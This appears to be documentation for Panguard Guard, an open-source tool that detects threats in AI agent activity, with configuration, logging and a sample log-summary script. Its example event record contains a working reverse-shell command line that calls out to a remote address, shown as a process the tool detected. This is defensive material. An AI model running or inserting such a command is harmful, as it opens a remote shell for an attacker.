Panguard Guard
Inline detection powered by a 5-agent pipeline. Guard watches AI agent tool calls, prompt flows, and skill behavior using ATR (Agent Threat Rules) plus behavioral baselines and on-device correlation — deterministic detection that blocks threats at runtime with no LLM in the detection path.
Free and open source under the MIT license. No account required.
Quick Start
panguard guard start
panguard guard status
panguard guard stop
By default, Guard starts in monitor mode. It logs threats but does not take automated action until you switch to protect mode.
5-Agent Pipeline
Every event flows through five specialised agents in sequence. Each agent enriches the event context before passing it to the next.
| Agent | Role | Description |
|---|---|---|
| Detect | Rule matching | Runs ATR rules against incoming telemetry. Produces raw alerts with severity and confidence scores. |
| Analyze | Correlation | Cross-correlates alerts on-device against behavioral baselines and temporal patterns. Adjusts confidence scores deterministically — no LLM involved. |
| Respond | Action execution | Selects and executes response actions based on confidence thresholds: auto-act, confirm, or notify. |
| Report | Structured logging | Writes JSONL event records, generates daily summaries, and pushes notifications to configured channels. |
| Chat | Interactive query | Natural-language interface for investigating past events, tuning rules, and asking follow-up questions about alerts. |
Detection Engines
Guard ships with three rule engines. All rules are updated automatically via the Panguard rule feed.
| Engine | Rules | Scope |
|---|---|---|
| ATR | 652 | Agent Threat Rules. Purpose-built for AI agent security: prompt injection, tool poisoning, MCP server abuse, credential exfiltration, context manipulation, and skill supply-chain attacks. |
Detection Stages
Every stage is deterministic and runs entirely on-device. No LLM sits in the detection path, so the same input always produces the same verdict — online or fully air-gapped.
Optionally, you can connect your own model — a cloud API (Anthropic, OpenAI, OpenAI-compatible) or a local Ollama — to add an advisory semantic layer. It is off by default and runs alongside the detection path, not inside it: it can explain a verdict or flag a novel pattern for your review, but it never auto-blocks. Deterministic detection stays the only thing that acts.
Stage 1: Rule Engine
650+ ATR regex rules resolve clear-cut matches instantly. Pure pattern matching, fully deterministic.
Stage 2: Behavioral Baseline
Events that rules do not match are checked against behavioral baselines and fingerprints recorded during onboarding. Flags drift from expected behavior. No data leaves the machine.
Stage 3: Correlation & AST
Surviving events are cross-correlated on-device: AST static analysis of skill code plus temporal correlation of behavioral signals, producing a reproducible confidence-scored verdict.
Response Actions
Guard supports six response actions. In protect mode, the Respond agent selects actions automatically based on confidence thresholds.
| Action | Description |
|---|---|
| block_ip | Add source IP to firewall deny list (iptables / pf). |
| kill_process | Terminate the offending process tree immediately. |
| quarantine_file | Move file to quarantine directory and strip execute permissions. |
| alert | Send notification via configured channels (Slack, email, webhook). |
| snapshot | Capture full process state, environment, and open file handles for forensics. |
| escalate | Forward event to SOC / human analyst for manual triage. |
Confidence Thresholds
Configuration
View and modify Guard configuration interactively:
panguard guard config
Key Options
| Option | Values | Default | Description |
|---|---|---|---|
| mode | monitor \| protect | monitor | Monitor logs only, or actively respond to threats. |
| auto_response | true \| false | false | Enable automated response actions in protect mode. |
| notification.slack | webhook URL | (none) | Slack incoming webhook for alert delivery. |
| notification.email | address | (none) | Email address for critical alert notifications. |
| notification.webhook | URL | (none) | Generic webhook endpoint for all events. |
panguard guard config set mode protect
panguard guard config set auto_response true
panguard guard config set notification.slack https://hooks.slack.com/services/T.../B.../xxx
Monitoring and Logs
Guard writes structured event logs in JSONL format. Each line is a self-contained JSON object with timestamp, severity, rule ID, and action taken.
~/.panguard-guard/events.jsonl
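An added example, not part of Panguard: a Python script that summarises this log per rule (event count, highest confidence, actions and hosts seen) and reports lines it could not parse. It assumes the field names of the event record shown under Event Callback Format; the sample lines and the rule ID `atr:placeholder_rule_b` are constructed.

```python
import json
from collections import defaultdict

REQUIRED = ("timestamp", "severity", "rule_id", "confidence", "action")

# Constructed sample in the shape of events.jsonl. Line 1 reuses values from
# the record on this page (process block omitted); the rest is made up,
# including the placeholder rule ID and the truncated last line.
SAMPLE = """\
{"timestamp": "2026-03-08T14:32:01.442Z", "severity": "high", "rule_id": "atr:suspicious_shell_execution", "engine": "atr", "layer": 1, "confidence": 0.94, "action": "kill_process", "action_status": "executed", "host": "prod-web-03"}
{"timestamp": "2026-03-08T14:35:10.000Z", "severity": "high", "rule_id": "atr:suspicious_shell_execution", "engine": "atr", "layer": 1, "confidence": 0.71, "action": "alert", "action_status": "executed", "host": "prod-web-04"}
{"timestamp": "2026-03-08T14:36:00.000Z", "severity": "high", "rule_id": "atr:placeholder_rule_b", "engine": "atr", "layer": 1, "confidence": 0.4, "action": "alert", "action_status": "executed", "host": "prod-web-03"}

{"timestamp": "2026-03-08T14:40:
"""


def summarise(lines, min_confidence=0.0):
    """Group events by rule_id; return (per-rule summary, skipped line numbers)."""
    rules = defaultdict(lambda: {"count": 0, "max_confidence": 0.0,
                                 "actions": set(), "hosts": set()})
    skipped = []
    for lineno, raw in enumerate(lines, 1):
        raw = raw.strip()
        if not raw:
            continue  # blank lines are not events
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            skipped.append(lineno)  # e.g. a record still being written
            continue
        if (not isinstance(ev, dict) or any(k not in ev for k in REQUIRED)
                or not isinstance(ev["confidence"], (int, float))):
            skipped.append(lineno)  # valid JSON but not an event record
            continue
        if ev["confidence"] < min_confidence:
            continue
        entry = rules[ev["rule_id"]]
        entry["count"] += 1
        entry["max_confidence"] = max(entry["max_confidence"], ev["confidence"])
        entry["actions"].add(ev["action"])
        entry["hosts"].add(ev.get("host", "unknown"))
    return dict(rules), skipped


if __name__ == "__main__":
    summary, bad = summarise(SAMPLE.splitlines())
    for rule, s in sorted(summary.items(), key=lambda kv: -kv[1]["count"]):
        print(rule, s["count"], s["max_confidence"], sorted(s["actions"]), sorted(s["hosts"]))
    print("skipped lines:", bad)
```

To run it against a real log, pass the open file object for `~/.panguard-guard/events.jsonl` to `summarise()` in place of `SAMPLE.splitlines()`.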
Verbose Output
Use the --verbose flag to stream events to stdout in real time:
panguard guard start --verbose
Event Callback Format
Each event record follows this structure:
{
  "timestamp": "2026-03-08T14:32:01.442Z",
  "severity": "high",
  "rule_id": "atr:suspicious_shell_execution",
  "engine": "atr",
  "layer": 1,
  "confidence": 0.94,
  "action": "kill_process",
  "action_status": "executed",
  "process": {
    "pid": 48291,
    "name": "bash",
    "cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
  },
  "host": "prod-web-03"
}
System Service
Install Guard as a system service so it starts automatically on boot. On Linux this creates a systemd unit; on macOS it creates a launchd plist.
panguard guard install
panguard guard uninstall
Both commands require root / administrator privileges. Guard will prompt for elevation if not already running as root.
Telemetry
Guard collects anonymous usage telemetry to improve rule quality and false-positive rates. No file contents, process arguments, or personally identifiable information is ever transmitted.
panguard guard start --no-telemetry
panguard guard --show-upload-data
Full details on data collection and retention are available in PRIVACY.md.
Platform Notes
| Feature | Linux | macOS | Windows |
|---|---|---|---|
| Core Guard daemon | Yes | Yes | Yes |
| ATR Rules | Yes | Yes | Yes |
| systemd service | Yes | -- | -- |
| launchd service | -- | Yes | -- |
For advanced configuration options, see the Advanced Setup Guide.
Start Protecting
Install Panguard and activate Guard in under a minute. Everything here — full scan and all rule-based protection layers — is free and open source today.
panguard guard start